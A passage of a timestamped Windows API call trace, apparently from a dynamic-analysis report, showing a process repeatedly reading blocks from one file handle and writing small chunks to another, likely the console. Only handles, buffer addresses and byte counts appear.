lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.791] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) 
returned 1 [0232.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.792] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.792] GetFileType (hFile=0x4c) returned 0x1 [0232.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] GetFileType (hFile=0x4c) returned 0x1 [0232.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.793] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.794] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] GetFileType (hFile=0x4c) returned 0x1 [0232.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.794] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.795] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.796] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, 
lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.798] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.799] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] GetFileType (hFile=0x4c) returned 0x1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] GetFileType (hFile=0x4c) returned 0x1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.801] SetFilePointerEx (in: 
